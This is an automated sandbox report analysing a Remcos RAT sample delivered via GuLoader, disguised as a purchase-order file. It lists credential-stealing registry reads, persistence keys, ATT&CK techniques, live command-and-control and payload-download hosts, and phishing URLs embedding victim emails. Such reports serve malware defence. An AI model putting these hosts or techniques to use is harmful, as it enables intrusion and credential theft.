            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: ESMTPPassword7_2_004033F0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword7_2_00402DB3
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword7_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 3536, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-B4UZRVJump to behavior
            Source: Yara matchFile source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            11
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            2
            Credentials in Registry
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
            Process Injection
            1
            Software Packing
            1
            Credentials In Files
            3
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS228
            System Information Discovery
            Distributed Component Object Model2
            Clipboard Data
            1
            Remote Access Software
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets231
            Security Software Discovery
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture113
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563962 Sample: Purchase-Order27112024.scr.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 28 mynewpro.online 2->28 30 www.healthselflesssupplies.co.za 2->30 32 2 other IPs or domains 2->32 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Yara detected GuLoader 2->50 52 9 other signatures 2->52 8 Purchase-Order27112024.scr.exe 1 27 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 8->24 dropped 54 Detected unpacking (changes PE section rights) 8->54 56 Tries to steal Mail credentials (via file registry) 8->56 58 Drops PE files with a suspicious file extension 8->58 60 2 other signatures 8->60 12 Purchase-Order27112024.scr.exe 4 15 8->12         started        signatures6 process7 dnsIp8 34 mynewpro.online 94.156.227.184, 2404, 49776, 49781 NETIXBG Bulgaria 12->34 36 healthselflesssupplies.co.za 164.160.91.32, 443, 49755 ElitehostZA South Africa 12->36 38 geoplugin.net 178.237.33.50, 49782, 80 ATOM86-ASATOM86NL Netherlands 12->38 26 C:\Users\user\AppData\...\Perissodactylic.scr, PE32 12->26 dropped 62 Detected Remcos RAT 12->62 64 Creates autostart registry keys with suspicious values (likely registry only malware) 12->64 66 Maps a DLL or memory area into another process 12->66 17 Purchase-Order27112024.scr.exe 1 12->17         started        20 Purchase-Order27112024.scr.exe 1 12->20         started        22 Purchase-Order27112024.scr.exe 2 12->22         started        file9 signatures10 process11 signatures12 40 Tries to steal Instant Messenger accounts or passwords 17->40 42 Tries to harvest and steal browser information (history, passwords, etc) 17->42 44 Tries to steal Mail credentials (via file / registry access) 20->44

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Purchase-Order27112024.scr.exe11%ReversingLabs
            Purchase-Order27112024.scr.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr11%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin0%Avira URL Cloudsafe
            https://www.healthselflesssupplies.co.za/0%Avira URL Cloudsafe
            https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.binfH0%Avira URL Cloudsafe
            https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin_I0%Avira URL Cloudsafe
            mynewpro.online0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            mynewpro.online
            94.156.227.184
            truetrue
              unknown
              geoplugin.net
              178.237.33.50
              truefalse
                high
                healthselflesssupplies.co.za
                164.160.91.32
                truefalse
                  unknown
                  www.healthselflesssupplies.co.za
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    mynewpro.onlinetrue
                    • Avira URL Cloud: safe
                    unknown
                    http://geoplugin.net/json.gpfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin_IPurchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.office.com/bhv2E52.tmp.6.drfalse
                        high
                        http://www.imvu.comrPurchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          high
                          http://geoplugin.net/json.gplPurchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.imvu.compDataPurchase-Order27112024.scr.exe, 00000008.00000003.2567218820.000000000096D000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000003.2567182006.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://aefd.nelreports.net/api/report?cat=bingthbhv2E52.tmp.6.drfalse
                                high
                                http://geoplugin.net/json.gphyPurchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.imvu.comPurchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000003.2567218820.000000000096D000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000003.2567182006.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://aefd.nelreports.net/api/report?cat=wsbbhv2E52.tmp.6.drfalse
                                      high
                                      http://geoplugin.net/json.gpqPurchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.nirsoft.netPurchase-Order27112024.scr.exe, 00000006.00000002.2586522096.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                          high
                                          https://aefd.nelreports.net/api/report?cat=bingaotakbhv2E52.tmp.6.drfalse
                                            high
                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv2E52.tmp.6.drfalse
                                              high
                                              https://deff.nelreports.net/api/report?cat=msnbhv2E52.tmp.6.drfalse
                                                high
                                                http://nsis.sf.net/NSIS_ErrorErrorPurchase-Order27112024.scr.exe, Perissodactylic.scr.2.drfalse
                                                  high
                                                  http://geoplugin.net/json.gpaluPurchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comPurchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.comPurchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        high
                                                        http://geoplugin.net/json.gp4nPurchase-Order27112024.scr.exe, 00000002.00000003.2541249987.0000000006468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhv2E52.tmp.6.drfalse
                                                            high
                                                            https://www.healthselflesssupplies.co.za/Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://aefd.nelreports.net/api/report?cat=bingaotbhv2E52.tmp.6.drfalse
                                                              high
                                                              https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.binfHPurchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv2E52.tmp.6.drfalse
                                                                high
                                                                https://aefd.nelreports.net/api/report?cat=bingrmsbhv2E52.tmp.6.drfalse
                                                                  high
                                                                  https://www.google.com/accounts/serviceloginPurchase-Order27112024.scr.exefalse
                                                                    high
                                                                    https://login.yahoo.com/config/loginPurchase-Order27112024.scr.exefalse
                                                                      high
                                                                      http://geoplugin.net/json.gpXPurchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.nirsoft.net/Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv2E52.tmp.6.drfalse
                                                                            high
                                                                            http://www.ebuddy.comPurchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              164.160.91.32
                                                                              healthselflesssupplies.co.zaSouth Africa
                                                                              328037ElitehostZAfalse
                                                                              94.156.227.184
                                                                              mynewpro.onlineBulgaria
                                                                              57463NETIXBGtrue
                                                                              178.237.33.50
                                                                              geoplugin.netNetherlands
                                                                              8455ATOM86-ASATOM86NLfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1563962
                                                                              Start date and time:2024-11-27 16:49:09 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 9m 41s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:9
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Purchase-Order27112024.scr.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.phis.troj.spyw.evad.winEXE@9/14@4/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 97%
                                                                              • Number of executed functions: 173
                                                                              • Number of non-executed functions: 321
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: Purchase-Order27112024.scr.exe
                                                                              TimeTypeDescription
                                                                              10:51:12API Interceptor3307475x Sleep call for process: Purchase-Order27112024.scr.exe modified
                                                                              16:50:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
                                                                              16:50:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              164.160.91.32https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                178.237.33.508gLdIfw09Wi50H5.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • geoplugin.net/json.gp
                                                                                SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                awb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                4MP0E0gWFJ.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                • geoplugin.net/json.gp
                                                                                Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • geoplugin.net/json.gp
                                                                                1732558817bbcbf1fb4c5fb0223fe676ac7a21c34a2edc448b45a4a989f86b416d1dcecdef824.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • geoplugin.net/json.gp
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                geoplugin.net8gLdIfw09Wi50H5.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 178.237.33.50
                                                                                SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                awb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                4MP0E0gWFJ.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                1732558817bbcbf1fb4c5fb0223fe676ac7a21c34a2edc448b45a4a989f86b416d1dcecdef824.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                ATOM86-ASATOM86NL8gLdIfw09Wi50H5.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 178.237.33.50
                                                                                SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                awb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                4MP0E0gWFJ.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                1732558817bbcbf1fb4c5fb0223fe676ac7a21c34a2edc448b45a4a989f86b416d1dcecdef824.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                ElitehostZAhttps://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                • 164.160.91.32
                                                                                https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.comGet hashmaliciousUnknownBrowse
                                                                                • 164.160.91.37
                                                                                https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6Get hashmaliciousUnknownBrowse
                                                                                • 164.160.91.31
                                                                                https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ==Get hashmaliciousUnknownBrowse
                                                                                • 164.160.91.31
                                                                                http://www.fire.co.zaGet hashmaliciousUnknownBrowse
                                                                                • 164.160.91.17
                                                                                https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20=Get hashmaliciousUnknownBrowse
                                                                                • 164.160.91.23
                                                                                https://ums.koreanair.com/Check.html?redirectUrl=TV9JRD01MTMy&U1RZUEU9TUFTUw==&TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=&UE9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=&S0lORD1D&Q0lEPTAwMg==&URL=https://harriswilliams.apor.co.za/6fh8je/Ymx1Y2FzQGhhcnJpc3dpbGxpYW1zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                • 164.160.91.23
                                                                                Q_u_a_r_a_nt_i_n_e A_l_e_r_t giovanni.busco RD6KUA46 648950657.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 164.160.91.37
                                                                                http://py.gm7ad.shishabuzz.co.za.#.aHR0cHM6Ly9sb2dpbi1taWNyb3NvZnRteWRvbWFpbnNjb20uZ2FzdG9yYWtlb3BhLmNvbS8/dXNlcm5hbWU9Z3JlZ29yeS53ZXN0QGFsZ29tYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                • 164.160.91.42
                                                                                http://3e.hlite.shishabuzz.co.za./#.aHR0cHM6Ly9iYWZ5YmVpZ2d6Y2N3dHVlZGNycXhqdW03ZWJlNGZ0eDUzdWt1eDZpbHFid2x1aml2a3QzcDJ1ZWR6dS5pcGZzLnczcy5saW5rL3h4eXMuaHRtbCN5dm9ubmVfY29udHJlcmFzQGZkLm9yZw==Get hashmaliciousHTMLPhisherBrowse
                                                                                • 164.160.91.42
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                37f463bf4616ecd445d4a1937da06e19Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                • 164.160.91.32
                                                                                z34SOLICITUDDEP.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 164.160.91.32
                                                                                SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 164.160.91.32
                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 164.160.91.32
                                                                                awb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 164.160.91.32
                                                                                6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                                                                • 164.160.91.32
                                                                                vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                • 164.160.91.32
                                                                                z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 164.160.91.32
                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                • 164.160.91.32
                                                                                Viderefrt.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 164.160.91.32
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                                  debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                                                                    debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                                                                      HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                                                                        HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                                                                          z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                                                                                            z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                                                                                              _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):962
                                                                                                    Entropy (8bit):5.015105568788186
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                    MD5:8937B63DC0B37E949F38E7874886D999
                                                                                                    SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                                                                                                    SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                                                                                                    SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48
                                                                                                    Entropy (8bit):4.829448698502606
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:15KlW9HAQLQIfLBJXlFGfv:1IlW9gQkIPeH
                                                                                                    MD5:E7F60749537446D1C77072173B5415A3
